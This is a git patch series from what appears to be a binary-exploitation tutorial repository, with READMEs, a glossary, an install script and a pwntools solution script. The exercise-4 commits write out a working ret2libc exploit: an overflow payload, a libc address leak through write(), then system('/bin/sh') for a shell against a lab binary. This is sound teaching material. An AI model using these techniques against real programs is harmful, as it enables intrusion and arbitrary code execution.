From c684ce039e343c55e3f7947491652cd21ed69f7c Mon Sep 17 00:00:00 2001 From: bert88sta Date: Thu, 26 May 2016 08:19:46 -0400 Subject: [PATCH 01/48] Changes to be committed: modified: README.md new file: exercise-4/.gdb_history new file: exercise-4/peda-session-exercise-4.txt --- README.md | 9 +++++---- exercise-4/.gdb_history | 10 ++++++++++ exercise-4/peda-session-exercise-4.txt | 2 ++ 3 files changed, 17 insertions(+), 4 deletions(-) create mode 100644 exercise-4/.gdb_history create mode 100644 exercise-4/peda-session-exercise-4.txt diff --git a/README.md b/README.md index 86dddb3..c31b0ee 100644 --- a/README.md +++ b/README.md @@ -48,7 +48,8 @@ less painful. It can be installed by running `sudo pip intall pwntools` ##Buffer Overflows and ROP: -* [1: The power of SEGFAULT](exercise-1) -* [2: Build your own `system()`](exercise-2) -* [3: Follow the Yellow Brick Functions](exercise-3) -* [4: Pay a Visit to Your Local Library](exercise-4) +* [1: The power of SEGFAULT](exercise-1) +* [2: Build your own `system()`](exercise-2) +* [3: Follow the Yellow Brick Functions](exercise-3) +* [3.5: Learning pwntools](exercise-3.5) +* [4: Pay a Visit to Your Local Library](exercise-4) diff --git a/exercise-4/.gdb_history b/exercise-4/.gdb_history new file mode 100644 index 0000000..ea0bf60 --- /dev/null +++ b/exercise-4/.gdb_history @@ -0,0 +1,10 @@ +file exercise-4 +disas main +b*main+194 +r < <(python -c 'print "A"*140 + "\x7d\x84\x04\x08" + "A"*148') +x /150wx $esp +x /150wx $esp-0x40 +x /150wx $esp+0x40 +x /150wx $esp-0x40 +x /150wx $esp-0x100 +q diff --git a/exercise-4/peda-session-exercise-4.txt b/exercise-4/peda-session-exercise-4.txt new file mode 100644 index 0000000..39579c8 --- /dev/null +++ b/exercise-4/peda-session-exercise-4.txt @@ -0,0 +1,2 @@ +break *main+194 + From df5b94acd1fa073dd4c0bf100578813702acfb43 Mon Sep 17 00:00:00 2001 From: bert88sta Date: Thu, 26 May 2016 08:59:38 -0400 Subject: [PATCH 02/48] Changes to be committed: modified: README.md --- exercise-4/README.md | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) diff --git a/exercise-4/README.md b/exercise-4/README.md index f8b1e65..6ae0e97 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -50,4 +50,38 @@ After 140 bytes, we have `%eip` From here, we need to leak the address of a libc function. +We can do this by calling `write(1,&function,4)` +I'll be using the GOT address of `read()` (remember that the GOT is an array of +pointers into libc) + + +``` +$ objdump -d exercise-4 | grep ">:a" +... +08048370 : +... + +$ objdump -R exercise-4 +... +0804a00c R_386_JUMP_SLOT read +... +``` + +With these addresses, we get the following exploit. + + +``` +python -c 'print "A"*140 + "\x70\x83\x04\x08" + "RETN" + +"\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00"' | ./exercise-4 +``` + +If you go ahead and run this a few times, you'll get some weird outputs: +``` +�+o�Segmentation fault (core dumped) +�kh�Segmentation fault (core dumped) +��n�Segmentation fault (core dumped) +``` + +The four bytes before the SEGFAULT are the libc address. Now this is why we +need pwntools. From f7623ce53678e6ef3000bcd735a98c4e8ce4aee0 Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 1 Jun 2016 18:15:01 +0000 Subject: [PATCH 03/48] modified: README.md modified: soln_exercise-4.py --- exercise-4/peda-session-exercise-4.txt | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 exercise-4/peda-session-exercise-4.txt diff --git a/exercise-4/peda-session-exercise-4.txt b/exercise-4/peda-session-exercise-4.txt deleted file mode 100644 index 39579c8..0000000 --- a/exercise-4/peda-session-exercise-4.txt +++ /dev/null @@ -1,2 +0,0 @@ -break *main+194 - From 7c700e4f512dce77e1bcd6b8c99f3d1f877bc803 Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 1 Jun 2016 18:15:50 +0000 Subject: [PATCH 04/48] modified: README.md modified: soln_exercise-4.py --- exercise-4/.gdb_history | 5 +++++ exercise-4/README.md | 30 ++++++++++++++++++++++++++++++ exercise-4/soln_exercise-4.py | 16 ++++++++++------ 3 files changed, 45 insertions(+), 6 deletions(-) diff --git a/exercise-4/.gdb_history b/exercise-4/.gdb_history index ea0bf60..f108290 100644 --- a/exercise-4/.gdb_history +++ b/exercise-4/.gdb_history @@ -8,3 +8,8 @@ x /150wx $esp+0x40 x /150wx $esp-0x40 x /150wx $esp-0x100 q +p &bss +p &__bss_start +info file +p &__bss_start +q diff --git a/exercise-4/README.md b/exercise-4/README.md index 6ae0e97..0da7322 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -85,3 +85,33 @@ If you go ahead and run this a few times, you'll get some weird outputs: The four bytes before the SEGFAULT are the libc address. Now this is why we need pwntools. + +From here, we're going to run: +``` +$ ldd exercise-4 + linux-gate.so.1 => (0xf76f9000) + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf753c000) + /lib/ld-linux.so.2 (0xf76fa000) +``` + +Since this is a local binary challenge, the libc file is just going to be +whatever the standard one is on your computer. **The same binary running on a +different machine could have a different libc.** + +All we have to do is grab a copy of that libc and put it in our directory +If you ever exploit a remote binary anf you don't have the libc, there are +plenty of places you can get them online. +``` +$ cp /lib/i386-linux-gnu/libc.so.6 ./ +``` + +Now we need pwntools. + +We'll start our script off with the typical items: + +```Python +from pwn import * +context(arch='i386', os='linux') # <-- Add the architecture and os +binary = ELF("exercise-4") +libc = ELF("libc.so.6") +``` diff --git a/exercise-4/soln_exercise-4.py b/exercise-4/soln_exercise-4.py index 8e2feae..eaf0c42 100644 --- a/exercise-4/soln_exercise-4.py +++ b/exercise-4/soln_exercise-4.py @@ -6,22 +6,26 @@ write_plt = p32(binary.symbols["write"]) read_plt = p32(binary.symbols["read"]) bss_addr = p32(binary.symbols["__bss_start"]) -print binary.symbols +pop_ret = "\x9d\x85\x04\x08" r=process("./exercise-4") -""" You can use these to test it as a server over localhost - +""" +You can use these to test it as a server over localhost r=remote("127.0.0.1",1337) + + +run this in a different terminal VVVV + socat tcp-listen:1337,fork,reuseaddr exec:"strace ./exercise-4" """ r.recvline() -exploit = "A"*140 -exploit += write_plt + "\x9d\x85\x04\x08" + "\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00" +exploit = "A"*140 +exploit += write_plt + p32(1)+ "\x0c\xa0\x04\x08" + p32(4) exploit += p32(binary.symbols["main"]) r.sendline(exploit) @@ -30,5 +34,5 @@ libc_base = addr_read - libc.symbols["read"] system = p32(libc_base + libc.symbols["system"]) binsh = p32(libc_base + libc.search("/bin/sh").next()) -r.sendline("A"*148+ system + "POOP" + binsh + binsh) # <- 148?????? why 148? +r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148? r.interactive() From fc5693373c9d3e3e4c6c345315cba8029631551d Mon Sep 17 00:00:00 2001 From: bert88sta Date: Thu, 2 Jun 2016 15:14:02 -0400 Subject: [PATCH 05/48] Changes to be committed: modified: README.md modified: soln_exercise-4.py --- exercise-4/README.md | 73 +++++++++++++++++++++++++++++++++++ exercise-4/soln_exercise-4.py | 6 +-- 2 files changed, 75 insertions(+), 4 deletions(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index 0da7322..f39bb8e 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -114,4 +114,77 @@ from pwn import * context(arch='i386', os='linux') # <-- Add the architecture and os binary = ELF("exercise-4") libc = ELF("libc.so.6") + +r=process("./exercise-4") +``` + + +after this, we know we'll need the `read()`,`wrte()`, the GOT address of +`read()`, and a `pop ; ret` ropgadget, so we add these in. +```Pyton +write_plt = p32(binary.symbols["write"]) +read_GOT = p32(binary.symbols["got.read"]) +read_plt = p32(binary.symbols["read"]) +bss_addr = p32(binary.symbols["__bss_start"]) +pop_ret = "\x9d\x85\x04\x08" +``` + +Now the binary outputs a line first, so we add + +```Python +r.recvline() +``` + +Now we should start building our exploit. We want to try to avoid using the +escape strings from before, it makes for nicer code and forces you to use +pwntools the right way. + +we add: + +```Python +exploit = "A"*140 # EIP offset +exploit += write_plt +pop_ret + p32(1)+ read_GOT + p32(4) # Call to write() +exploit += p32(binary.symbols["main"]) # Call main() again to retrigger the vulnerability + +``` + +Now we want to send the first payload: + +```Python +r.sendline(exploit) +``` + +Now here's the cool part. Since we know that the program prints out the address +of `read()` in the libc (remember those funky bytes from earlier before the +SEGFAULT?) we can take those and calculate the base address of libc. This +indirectly means that we can call any function in the standard library. + +``` +addr_read = int(r.recv(4)[::-1].encode("hex"),16) +r.recvline() +libc_base = addr_read - libc.symbols["read"] +system = p32(libc_base + libc.symbols["system"]) +``` + +For those unfamiliar with my hacky `addr_read` line, here's what it does. +First, it `recv()`'s 4 bytes. Then, it reverses them (remember the little +endian). Then it takes them and converts them to hex, and parses that as an +integer. Voila, we have the address of `read()` in the libc. From there, we +subtract `read()`s address in the regular libc, giving us the base address for +this runtime. In the last line, we add the offset of `system()` in the libc to +our calculated base. This gives us the address of system for this runtime. + +The best part of this whole show is that the pesky "/bin/sh" string we seem to +keep needing is in the libc! We can calculate the address of that as well! + +``` +binsh = p32(libc_base + libc.search("/bin/sh").next()) +``` + +Now all we've got to do is send our exploit with some extra padding (it was 140 +before, but now it's 148 since we overflow from before the stack frame) and we +get a shell. +``` +r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148? +r.interactive() ``` diff --git a/exercise-4/soln_exercise-4.py b/exercise-4/soln_exercise-4.py index eaf0c42..9170f39 100644 --- a/exercise-4/soln_exercise-4.py +++ b/exercise-4/soln_exercise-4.py @@ -4,12 +4,12 @@ libc = ELF("libc.so.6") write_plt = p32(binary.symbols["write"]) +read_GOT = p32(binary.symbols["got.read"]) read_plt = p32(binary.symbols["read"]) bss_addr = p32(binary.symbols["__bss_start"]) pop_ret = "\x9d\x85\x04\x08" - r=process("./exercise-4") """ @@ -18,14 +18,12 @@ run this in a different terminal VVVV - socat tcp-listen:1337,fork,reuseaddr exec:"strace ./exercise-4" - """ r.recvline() exploit = "A"*140 -exploit += write_plt + p32(1)+ "\x0c\xa0\x04\x08" + p32(4) +exploit += write_plt +pop_ret + p32(1)+ read_GOT + p32(4) exploit += p32(binary.symbols["main"]) r.sendline(exploit) From 214aa623cf7f48ba865cc99704972b5620643e71 Mon Sep 17 00:00:00 2001 From: Bret Date: Sat, 4 Jun 2016 15:55:41 +0000 Subject: [PATCH 06/48] new file: README.md --- exercise-3.5/README.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 exercise-3.5/README.md diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md new file mode 100644 index 0000000..5f1926d --- /dev/null +++ b/exercise-3.5/README.md @@ -0,0 +1,3 @@ +#pwntools + +####It's pretty great From a900d6441724873f4fbac2df4b2357fd8b556c45 Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 22 Jun 2016 03:08:33 +0000 Subject: [PATCH 07/48] modified: README.md --- exercise-3.5/README.md | 57 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index 5f1926d..d4b2fd5 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,3 +1,60 @@ #pwntools ####It's pretty great + + +First things first: +``` +from pwn import * +``` + +That's just a generic import statement. + +``` +context(arch='i386', os='linux') +``` + +this just sets the context for other functions that we'll describe later. + + +``` +binary = ELF("some_challenge") +libc = ELF("some_libc") +``` + +This part adds two ELF objects, binary and libc. ELF objects are supremely +useful; they give you access to a wide array of methods and data fields. +I almost always have both of these lines in my script, even if the libc one is +commented out. + + +``` +r=process("./some_challenge") +``` + +This simply executes the challenge (in the same directory.) + +Alternatively: +``` +r=remote("127.0.0.1",1337) #<-- Replace with actual HOST,PORT +``` + +will run it remotely (many CTFs will not give you a full shell, just a host and +a port to connect to the binary) + +Now many of you will remember taking adresses and turning them into python +escape sequences by hand. + +``` +say for example the address of write() in a binary is 0xdeadbeef +\xef\xbe\xed\xda +``` + +would be the resulting python escape. However, pwntools can take care of this. + +``` +write = p32(binary.symbols["write"]) +``` + +this "packs" (converts to the escape seqence, sort of) the address of write for +us on a 32 bit machine. `p64()` also exists, for 64 bit machines. From 7bab892f4b2532c723f14e8c72bcf11db84eb97d Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 22 Jun 2016 03:10:04 +0000 Subject: [PATCH 08/48] modified: README.md --- exercise-3.5/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index d4b2fd5..55772c1 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,4 +1,5 @@ #pwntools +--- ####It's pretty great From f5bea24821b554eae826546863afba913e92615c Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 22 Jun 2016 03:11:41 +0000 Subject: [PATCH 09/48] modified: README.md --- exercise-3.5/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index 55772c1..7086264 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,8 +1,8 @@ #pwntools ---- -####It's pretty great +##Attention: This is just an overview RTFM :D +##https://pwntools.readthedocs.io First things first: ``` From de400502fdc6018c4066f65b9f3ef340185db8e9 Mon Sep 17 00:00:00 2001 From: bert88sta Date: Mon, 4 Jul 2016 11:54:38 -0400 Subject: [PATCH 10/48] modified: README.md --- exercise-3.5/README.md | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index 7086264..a875348 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,8 +1,8 @@ #pwntools -##Attention: This is just an overview RTFM :D +##Attention: This is just an overview. -##https://pwntools.readthedocs.io +##RTFM: https://pwntools.readthedocs.io First things first: ``` @@ -59,3 +59,16 @@ write = p32(binary.symbols["write"]) this "packs" (converts to the escape seqence, sort of) the address of write for us on a 32 bit machine. `p64()` also exists, for 64 bit machines. + + +Assuming 'r' is an instantiated process or remote, you can now use these +methods to communicate with the binary + +``` +r.sendline("This sends a string with a newline appended to the end") +r.send("This also sends a string") +``` + +Now me telling you all of this is kind of useless without you getting real +experience.** At this point I would strongly recommend solving the first 3 +challenges using pwntools.** From 8c1b8d79ce271af60fc0e3fc758513c33f83dd7a Mon Sep 17 00:00:00 2001 From: bert88sta Date: Sun, 9 Oct 2016 14:17:43 -0400 Subject: [PATCH 11/48] Added columns to test --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index c31b0ee..7606c4d 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ less painful. It can be installed by running `sudo pip intall pwntools` -##Introductory Tutorials: - -* [Intro 1: What is a binary, really?](intro-1) -* [Intro 2: Screwing around with the stack](intro-2) +|##Introductory Tutorials: |##Recommended Reading| +| || +|* [Intro 1: What is a binary, really?](intro-1) || +|* [Intro 2: Screwing around with the stack](intro-2) || ##Buffer Overflows and ROP: From bd7c3b9d0fcbbd26a9263aa2e6651de49379fb5c Mon Sep 17 00:00:00 2001 From: bert88sta Date: Sun, 9 Oct 2016 14:19:15 -0400 Subject: [PATCH 12/48] Added column --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7606c4d..7a2107b 100644 --- a/README.md +++ b/README.md @@ -42,7 +42,7 @@ less painful. It can be installed by running `sudo pip intall pwntools` |##Introductory Tutorials: |##Recommended Reading| -| || +|-------------------------------------------------------|---------------------| |* [Intro 1: What is a binary, really?](intro-1) || |* [Intro 2: Screwing around with the stack](intro-2) || From 55587c09c882b718c9f8a64bca7f29100de74627 Mon Sep 17 00:00:00 2001 From: bert88sta Date: Sun, 9 Oct 2016 14:21:42 -0400 Subject: [PATCH 13/48] added recommended reading --- README.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 7a2107b..463ec3b 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,11 @@ less painful. It can be installed by running `sudo pip intall pwntools` -|##Introductory Tutorials: |##Recommended Reading| -|-------------------------------------------------------|---------------------| -|* [Intro 1: What is a binary, really?](intro-1) || -|* [Intro 2: Screwing around with the stack](intro-2) || +##Introductory Tutorials: +* [Intro 1: What is a binary, really?](intro-1) +** *Recommended Reading:* +** This Link +* [Intro 2: Screwing around with the stack](intro-2) ##Buffer Overflows and ROP: From 5242c0aaee2dffcb14784e037e9e4f5acacd96a1 Mon Sep 17 00:00:00 2001 From: bert88sta Date: Sun, 9 Oct 2016 14:22:53 -0400 Subject: [PATCH 14/48] added read links --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 463ec3b..5496177 100644 --- a/README.md +++ b/README.md @@ -43,8 +43,8 @@ less painful. It can be installed by running `sudo pip intall pwntools` ##Introductory Tutorials: * [Intro 1: What is a binary, really?](intro-1) -** *Recommended Reading:* -** This Link + * *Recommended Reading:* + * This Link * [Intro 2: Screwing around with the stack](intro-2) ##Buffer Overflows and ROP: From 40f783125008dfe5d1e3b966a025913cdf825192 Mon Sep 17 00:00:00 2001 From: Harshal Sheth Date: Mon, 19 Dec 2016 15:41:05 -0500 Subject: [PATCH 15/48] fixed spelling --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5496177..0d2e4d5 100644 --- a/README.md +++ b/README.md @@ -31,13 +31,13 @@ I strongly recommend you install and use the following tools to make your life a bit easier: * [longld/peda](https://github.com/longld/peda/): I use this tool in all of - these tutorials. It provides a wide range of useful functions and makes gdb + these tutorials. It provides a wide range of useful functions and makes gdb` far more user friendly. Just follow the install instructions in the repo. * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an exploit framework built in my favorite language, python. It has a whole slew of useful functions and chicanery that makes the exploit process more fun and -less painful. It can be installed by running `sudo pip intall pwntools` +less painful. It can be installed by running `sudo pip install pwntools` From bf4607af98329bde196e68eac1750fe8f00469aa Mon Sep 17 00:00:00 2001 From: Harshal Sheth Date: Mon, 19 Dec 2016 15:42:25 -0500 Subject: [PATCH 16/48] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0d2e4d5..b38bbc4 100644 --- a/README.md +++ b/README.md @@ -31,7 +31,7 @@ I strongly recommend you install and use the following tools to make your life a bit easier: * [longld/peda](https://github.com/longld/peda/): I use this tool in all of - these tutorials. It provides a wide range of useful functions and makes gdb` + these tutorials. It provides a wide range of useful functions and makes `gdb` far more user friendly. Just follow the install instructions in the repo. * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an From 05a5b3e4fdc104dd644ee56752f7aff17621841e Mon Sep 17 00:00:00 2001 From: Santiago Castro Date: Sun, 16 Apr 2017 16:42:05 -0300 Subject: [PATCH 17/48] Fix broken Markdown headings --- README.md | 10 +++++----- exercise-1/README.md | 2 +- exercise-2/README.md | 8 ++++---- exercise-3.5/README.md | 6 +++--- exercise-3/README.md | 6 +++--- exercise-4/README.md | 2 +- intro-1/README.md | 4 ++-- intro-2/README.md | 2 +- terms/README.md | 8 ++++---- 9 files changed, 24 insertions(+), 24 deletions(-) diff --git a/README.md b/README.md index b38bbc4..c28ad87 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -#how2exploit_binary: get your hack on. +# how2exploit_binary: get your hack on. ### A note from the creator @@ -18,7 +18,7 @@ want to dual boot? Get a VM.** bert88sta -##The Grand Glossary of Terms +## The Grand Glossary of Terms I've compiled this list of as many useful things as I could find. It contains all sorts of goodies that I wish I had found or had explained to me earlier. If you have a question, it can probably be answered in here. Otherwise, get your @@ -26,7 +26,7 @@ Google-Fu on * [The Glossary](terms) -##External Tools. +## External Tools. I strongly recommend you install and use the following tools to make your life a bit easier: @@ -41,13 +41,13 @@ less painful. It can be installed by running `sudo pip install pwntools` -##Introductory Tutorials: +## Introductory Tutorials: * [Intro 1: What is a binary, really?](intro-1) * *Recommended Reading:* * This Link * [Intro 2: Screwing around with the stack](intro-2) -##Buffer Overflows and ROP: +## Buffer Overflows and ROP: * [1: The power of SEGFAULT](exercise-1) * [2: Build your own `system()`](exercise-2) diff --git a/exercise-1/README.md b/exercise-1/README.md index 40e1966..3f35b04 100644 --- a/exercise-1/README.md +++ b/exercise-1/README.md @@ -1,4 +1,4 @@ -#The power of SEGFAULT +# The power of SEGFAULT **Credit to [PicoCTF 2013](2013.picoctf.com) for problem** diff --git a/exercise-2/README.md b/exercise-2/README.md index 114b3e4..4565bab 100644 --- a/exercise-2/README.md +++ b/exercise-2/README.md @@ -1,13 +1,13 @@ -#Build your own `system()` +# Build your own `system()` Well, life is tough. Unlike in the first overflow exercise, I've made this one so that you can't just call a specific function and get a shell. However, we'll try to solve it anyways. ```C -#include -#include -#include +# include +# include +# include int main(int argc, char **argv) { if (argc>1) { diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index a875348..43af273 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,8 +1,8 @@ -#pwntools +# pwntools -##Attention: This is just an overview. +## Attention: This is just an overview. -##RTFM: https://pwntools.readthedocs.io +## RTFM: https://pwntools.readthedocs.io First things first: ``` diff --git a/exercise-3/README.md b/exercise-3/README.md index 34c8a9d..f98ee9a 100644 --- a/exercise-3/README.md +++ b/exercise-3/README.md @@ -1,10 +1,10 @@ -#Follow the Yellow Brick Functions +# Follow the Yellow Brick Functions In this problem, I smartened up. Nowhere in the binary will you find "/bin/sh" ```C -#include -#include +# include +# include int main(int argc, char **argv) { putenv("PATH="); printf("I've broken up my system call!\n"); diff --git a/exercise-4/README.md b/exercise-4/README.md index f39bb8e..e95fe67 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -1,4 +1,4 @@ -#Pay a visit to your Local Library +# Pay a visit to your Local Library At this point you're probably used to hunting through binaries for useful functions or code that you can use to get a shell. But what do you do without a diff --git a/intro-1/README.md b/intro-1/README.md index 4076fe7..515177c 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -1,4 +1,4 @@ -#Intro 1: What is a binary, really? +# Intro 1: What is a binary, really? In short, a binary is what happens when you take high level code such as C or C++, and compile it into something the computer can actually run. I believe in @@ -6,7 +6,7 @@ hands on learning, so we can take a look inside one to really find out. Consider the file [hello_world.c](hello_world.c): ```C -#include +# include int main() { printf("Hello World!\n"); } diff --git a/intro-2/README.md b/intro-2/README.md index 6e18907..899f0a8 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -1,4 +1,4 @@ -#Intro 2: Screwing aroung with the stack. +# Intro 2: Screwing aroung with the stack. **Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** diff --git a/terms/README.md b/terms/README.md index 23b1799..4a30db9 100644 --- a/terms/README.md +++ b/terms/README.md @@ -1,7 +1,7 @@ -#Words, Terms, and Phrases +# Words, Terms, and Phrases -#####This will your dictionary throughout these exercises. If it's not in here, -#####Contact me to ask and I will update it. +##### This will your dictionary throughout these exercises. If it's not in here, +##### Contact me to ask and I will update it. ## General terms for binaries: @@ -57,7 +57,7 @@ most linux flavors you can call this function with your own arbitrary arguments, you can effectively bypass NX protection -##General Terms +## General Terms **Arbitrary:** This word is used to imply the fullness of control that you might have given an exploit. If you can run *arbitrary* code or read/write From 342306a8404f671d55ec055fb89e8760cc1dbb6c Mon Sep 17 00:00:00 2001 From: sneakerhax Date: Mon, 25 Sep 2017 17:33:18 -0700 Subject: [PATCH 18/48] Fix grammar mistake --- terms/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/terms/README.md b/terms/README.md index 4a30db9..afd5e42 100644 --- a/terms/README.md +++ b/terms/README.md @@ -8,7 +8,7 @@ **Binary:** The binary is the compiled C or C++ file. Anything that is in the binary has a *constant address.* (usually, see PIE) -**libc:** A binary the is *dynamically linked* has a libc file. This means that +**libc:** A binary is *dynamically linked* and has a libc file. This means that the whole set of standard library functions are somewhere in memory to be used by the program From 465fb880207d0a95c30e2eea59983c7f9e205082 Mon Sep 17 00:00:00 2001 From: Bret Date: Fri, 29 Sep 2017 23:49:35 -0400 Subject: [PATCH 19/48] Setting up for some new things --- README.md | 5 +++++ install.sh | 21 +++++++++++++++++++++ 2 files changed, 26 insertions(+) create mode 100755 install.sh diff --git a/README.md b/README.md index c28ad87..59d3f16 100644 --- a/README.md +++ b/README.md @@ -42,6 +42,7 @@ less painful. It can be installed by running `sudo pip install pwntools` ## Introductory Tutorials: +* [Setup Script](./install.sh) * [Intro 1: What is a binary, really?](intro-1) * *Recommended Reading:* * This Link @@ -54,3 +55,7 @@ less painful. It can be installed by running `sudo pip install pwntools` * [3: Follow the Yellow Brick Functions](exercise-3) * [3.5: Learning pwntools](exercise-3.5) * [4: Pay a Visit to Your Local Library](exercise-4) + +## Heap Exploitation: + +* More to come here soon ;) diff --git a/install.sh b/install.sh new file mode 100755 index 0000000..de42f3f --- /dev/null +++ b/install.sh @@ -0,0 +1,21 @@ +# Update first +apt-get -y update; + +# Basic Programs that need installed +apt-get -y install gdb; +apt-get -y install gdbserver; +apt-get -y install git; +apt-get -y install python-dev; +apt-get -y install socat; +apt-get -y install vim; +apt-get -y install python-pip; + +pip install capstone; + +# This shouldn't take 3 tries.... +pip install pwntools; +pip install pwntools; +pip install pwntools; + +git clone https://github.com/longld/peda.git +echo "source ~/peda/peda.py" >> ~/.gdbinit From 5c72da146b2dd51291b4c16516f2584c178161a3 Mon Sep 17 00:00:00 2001 From: Bret Date: Fri, 29 Sep 2017 23:56:35 -0400 Subject: [PATCH 20/48] Changed username to match new handle --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 59d3f16..ef021e5 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ want to dual boot? Get a VM.** -Best of luck -bert88sta +[Bretley](https://github.com/Bretley) ## The Grand Glossary of Terms I've compiled this list of as many useful things as I could find. It contains From 8dff99994905d1870ad88f2ad5cf854d3922df7e Mon Sep 17 00:00:00 2001 From: Bret Date: Sat, 30 Sep 2017 01:27:26 -0400 Subject: [PATCH 21/48] Added link to first video + extra setup bit --- README.md | 4 ++-- install.sh | 1 + 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ef021e5..f12b855 100644 --- a/README.md +++ b/README.md @@ -44,8 +44,8 @@ less painful. It can be installed by running `sudo pip install pwntools` ## Introductory Tutorials: * [Setup Script](./install.sh) * [Intro 1: What is a binary, really?](intro-1) - * *Recommended Reading:* - * This Link + * [Companion Video](https://youtu.be/6cNbKnxbAWw) + * **Recommended Reading** * [Intro 2: Screwing around with the stack](intro-2) ## Buffer Overflows and ROP: diff --git a/install.sh b/install.sh index de42f3f..5d18434 100755 --- a/install.sh +++ b/install.sh @@ -9,6 +9,7 @@ apt-get -y install python-dev; apt-get -y install socat; apt-get -y install vim; apt-get -y install python-pip; +apt-get -y install gcc-multilib; pip install capstone; From 10c6bae7968da044eae4b1b1804248ab136b2928 Mon Sep 17 00:00:00 2001 From: Bret Date: Sat, 30 Sep 2017 01:30:54 -0400 Subject: [PATCH 22/48] Added reading link to intro-1 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f12b855..5f8d0ad 100644 --- a/README.md +++ b/README.md @@ -45,7 +45,7 @@ less painful. It can be installed by running `sudo pip install pwntools` * [Setup Script](./install.sh) * [Intro 1: What is a binary, really?](intro-1) * [Companion Video](https://youtu.be/6cNbKnxbAWw) - * **Recommended Reading** + * [Areece x86 Calling Conventions](http://codearcana.com/posts/2013/05/21/a-brief-introduction-to-x86-calling-conventions.html) * [Intro 2: Screwing around with the stack](intro-2) ## Buffer Overflows and ROP: From bfec24f4d308def8e0756d4849e0635e01ca8300 Mon Sep 17 00:00:00 2001 From: Finias Date: Sat, 13 Jan 2018 12:24:19 +0200 Subject: [PATCH 23/48] PLT Definition added --- terms/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/terms/README.md b/terms/README.md index afd5e42..a88f9fd 100644 --- a/terms/README.md +++ b/terms/README.md @@ -12,7 +12,7 @@ binary has a *constant address.* (usually, see PIE) the whole set of standard library functions are somewhere in memory to be used by the program -**PLT:** Stands for . The PLT is essentially a wrapper function for all +**PLT:** Stands for Procedure Linkage Table. The PLT is essentially a wrapper function for all functions directly called in the binary. *These are only used in dynamically linked binaries* From c5a486d69296ac94cc3eb96c99a7eb8bec198c66 Mon Sep 17 00:00:00 2001 From: sneakerhax Date: Sun, 28 Jan 2018 01:01:57 -0800 Subject: [PATCH 24/48] Fix spelling mistake --- exercise-4/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index e95fe67..811ebc2 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -99,7 +99,7 @@ whatever the standard one is on your computer. **The same binary running on a different machine could have a different libc.** All we have to do is grab a copy of that libc and put it in our directory -If you ever exploit a remote binary anf you don't have the libc, there are +If you ever exploit a remote binary and you don't have the libc, there are plenty of places you can get them online. ``` $ cp /lib/i386-linux-gnu/libc.so.6 ./ From 0a86cdb518944a2c03236d3005196f07aad54e19 Mon Sep 17 00:00:00 2001 From: sneakerhax Date: Sun, 28 Jan 2018 01:04:01 -0800 Subject: [PATCH 25/48] fix spelling 2 --- exercise-4/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index 